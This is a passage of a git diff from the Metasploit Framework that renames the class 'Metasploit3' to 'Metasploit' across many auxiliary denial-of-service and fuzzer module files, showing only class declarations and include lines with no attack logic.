78ad298e42..df91d94da2 100644 --- a/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb +++ b/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Dos include Exploit::Remote::Udp diff --git a/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb b/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb index c9704300cb..36c56104f9 100644 --- a/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb +++ b/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/tcp/junos_tcp_opt.rb b/modules/auxiliary/dos/tcp/junos_tcp_opt.rb index a44a526850..5b0d01376b 100644 --- a/modules/auxiliary/dos/tcp/junos_tcp_opt.rb +++ b/modules/auxiliary/dos/tcp/junos_tcp_opt.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/tcp/synflood.rb b/modules/auxiliary/dos/tcp/synflood.rb index 0ba1568205..166c5250fa 100644 --- a/modules/auxiliary/dos/tcp/synflood.rb +++ b/modules/auxiliary/dos/tcp/synflood.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/upnp/miniupnpd_dos.rb b/modules/auxiliary/dos/upnp/miniupnpd_dos.rb index cee1464fe9..e3c70791b0 100644 --- a/modules/auxiliary/dos/upnp/miniupnpd_dos.rb +++ b/modules/auxiliary/dos/upnp/miniupnpd_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/appian/appian_bpm.rb b/modules/auxiliary/dos/windows/appian/appian_bpm.rb index 9dfea04d72..ec8a8c8ead 100644 --- a/modules/auxiliary/dos/windows/appian/appian_bpm.rb +++ b/modules/auxiliary/dos/windows/appian/appian_bpm.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb b/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb index 18ac1c4212..eb56440b27 100644 --- a/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb +++ b/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb b/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb index 5686914817..4fc7a87747 100644 --- a/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb +++ b/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb b/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb index b082718fe9..31b6729340 100644 --- a/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb +++ b/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb b/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb index 8a2a932f4f..c8afc2c219 100644 --- a/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb +++ b/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb b/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb index ac1e6022f9..f1168ce7bb 100644 --- a/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb +++ b/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb b/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb index dc8ec4092e..cdf45237bf 100644 --- a/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb +++ b/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/solarftp_user.rb b/modules/auxiliary/dos/windows/ftp/solarftp_user.rb index b2288b7b1c..e222d7b09b 100644 --- a/modules/auxiliary/dos/windows/ftp/solarftp_user.rb +++ b/modules/auxiliary/dos/windows/ftp/solarftp_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/titan626_site.rb b/modules/auxiliary/dos/windows/ftp/titan626_site.rb index e97dc9134f..89f59f3e1e 100644 --- a/modules/auxiliary/dos/windows/ftp/titan626_site.rb +++ b/modules/auxiliary/dos/windows/ftp/titan626_site.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb b/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb index 4db6db9836..36df63e63a 100644 --- a/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb +++ b/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb b/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb index b948914501..cc24d06cbd 100644 --- a/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb +++ b/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb b/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb index db9d2e31c5..d6dc497051 100644 --- a/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb +++ b/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb b/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb index ed94c74c86..f2d349cead 100644 --- a/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb +++ b/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/games/kaillera.rb b/modules/auxiliary/dos/windows/games/kaillera.rb index c2fddc489a..dca8a370f6 100644 --- a/modules/auxiliary/dos/windows/games/kaillera.rb +++ b/modules/auxiliary/dos/windows/games/kaillera.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb b/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb index c1003c6a87..a80df49840 100644 --- a/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb +++ b/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/http/pi3web_isapi.rb b/modules/auxiliary/dos/windows/http/pi3web_isapi.rb index daf6ad587d..d709bcbc06 100644 --- a/modules/auxiliary/dos/windows/http/pi3web_isapi.rb +++ b/modules/auxiliary/dos/windows/http/pi3web_isapi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb b/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb index afb0eda518..206644e1f6 100644 --- a/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb +++ b/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/nat/nat_helper.rb b/modules/auxiliary/dos/windows/nat/nat_helper.rb index 09189c625e..8c54d06f5f 100644 --- a/modules/auxiliary/dos/windows/nat/nat_helper.rb +++ b/modules/auxiliary/dos/windows/nat/nat_helper.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb b/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb index 61ea317635..9c514a595c 100644 --- a/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb +++ b/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb b/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb index 79d649c253..365c7afe65 100644 --- a/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb +++ b/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb b/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb index fffd69b8dd..69e7e1eeaf 100644 --- a/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb +++ b/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb b/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb index f60c224d7d..6c03b85f97 100644 --- a/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb +++ b/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smb/ms09_001_write.rb b/modules/auxiliary/dos/windows/smb/ms09_001_write.rb index 65d494e2a3..38aeb962ce 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_001_write.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_001_write.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb index 78ebe1e3af..d1ae6f884f 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb index fe436b7ef0..8c38459cfd 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb b/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb index 692d3080de..475b3b1534 100644 --- a/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb +++ b/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb b/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb index 25fec756b7..18b823165f 100644 --- a/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb +++ b/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb b/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb index 51fa2bab02..cdf39d994a 100644 --- a/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb +++ b/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Udp #include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb b/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb index 2ba38d2064..6e3df8fe94 100644 --- a/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb +++ b/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC diff --git a/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb b/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb index d514712000..52b5535ecf 100644 --- a/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb +++ b/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb b/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb index 72166cc782..12b66637c7 100644 --- a/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb +++ b/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb b/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb index de18f018d1..ead38c3db2 100644 --- a/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb +++ b/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/tftp/pt360_write.rb b/modules/auxiliary/dos/windows/tftp/pt360_write.rb index 81f16d4860..943de69586 100644 --- a/modules/auxiliary/dos/windows/tftp/pt360_write.rb +++ b/modules/auxiliary/dos/windows/tftp/pt360_write.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/tftp/solarwinds.rb b/modules/auxiliary/dos/windows/tftp/solarwinds.rb index 7be42e23eb..db09b5c217 100644 --- a/modules/auxiliary/dos/windows/tftp/solarwinds.rb +++ b/modules/auxiliary/dos/windows/tftp/solarwinds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/wireshark/capwap.rb b/modules/auxiliary/dos/wireshark/capwap.rb index 9eeb6b614a..5f69982b53 100644 --- a/modules/auxiliary/dos/wireshark/capwap.rb +++ b/modules/auxiliary/dos/wireshark/capwap.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/wireshark/chunked.rb b/modules/auxiliary/dos/wireshark/chunked.rb index fa78ad8a42..67c2c24faa 100644 --- a/modules/auxiliary/dos/wireshark/chunked.rb +++ b/modules/auxiliary/dos/wireshark/chunked.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/wireshark/cldap.rb b/modules/auxiliary/dos/wireshark/cldap.rb index 63c678cc06..668a455b6d 100644 --- a/modules/auxiliary/dos/wireshark/cldap.rb +++ b/modules/auxiliary/dos/wireshark/cldap.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/wireshark/ldap.rb b/modules/auxiliary/dos/wireshark/ldap.rb index ee3f9bd317..c9177559ca 100644 --- a/modules/auxiliary/dos/wireshark/ldap.rb +++ b/modules/auxiliary/dos/wireshark/ldap.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb b/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb index 2d81a8f2c6..c6673d5a6f 100644 --- a/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb +++ b/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'bit-struct' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/fuzzers/ftp/client_ftp.rb b/modules/auxiliary/fuzzers/ftp/client_ftp.rb index f28388b2f2..272d87cecb 100644 --- a/modules/auxiliary/fuzzers/ftp/client_ftp.rb +++ b/modules/auxiliary/fuzzers/ftp/client_ftp.rb @@ -10,7 +10,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Exploit::Remote::TcpServer diff --git a/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb b/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb index 00cf7bcdf5..3e6c0fb306 100644 --- a/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb +++ b/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/fuzzers/http/http_form_field.rb b/modules/auxiliary/fuzzers/http/http_form_field.rb index b115f6dd62..8d31335aca 100644 --- a/modules/auxiliary/fuzzers/http/http_form_field.rb +++ b/modules/auxiliary/fuzzers/http/http_form_field.rb @@ -11,7 +11,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/fuzzers/http/http_get_uri_long.rb b/modules/auxiliary/fuzzers/http/http_get_uri_long.rb index 7dfe8a5d26..39d470e833 100644 --- a/modules/auxiliary/fuzzers/http/http_get_uri_long.rb +++ b/modules/auxiliary/fuzzers/http/http_get_uri_long.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb b/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb index 7f186ec68a..af93c72434 100644 --- a/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb +++ b/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb b/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb index 922de4aa88..d7663737cf 100644 --- a/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb +++ b/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/proto/ntp' require 'securerandom' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Fuzzer include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb index a6b195bf44..60b6daf8e3 100644 --- a/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb b/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb index 5d4486fc5e..a284f4e594 100644 --- a/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb +++ b/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb index 17ae41ffde..1934230226 100644 --- a/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb index a47564f63f..58361eb7b0 100644 --- a/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb index 22b0824f1f..a4a6ed482b 100644 --- a/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb b/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb index a8eec1e014..4f839d9d04 100644 --- a/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb +++ b/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb index de640033a7..c8d6265fa1 100644 --- a/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb b/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb index 607d774e18..3077e17d27 100644 --- a/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb +++ b/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb @@ -10,7 +10,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb b/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb index 23d1f9cb56..cfe34b4e15 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb +++ b/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git 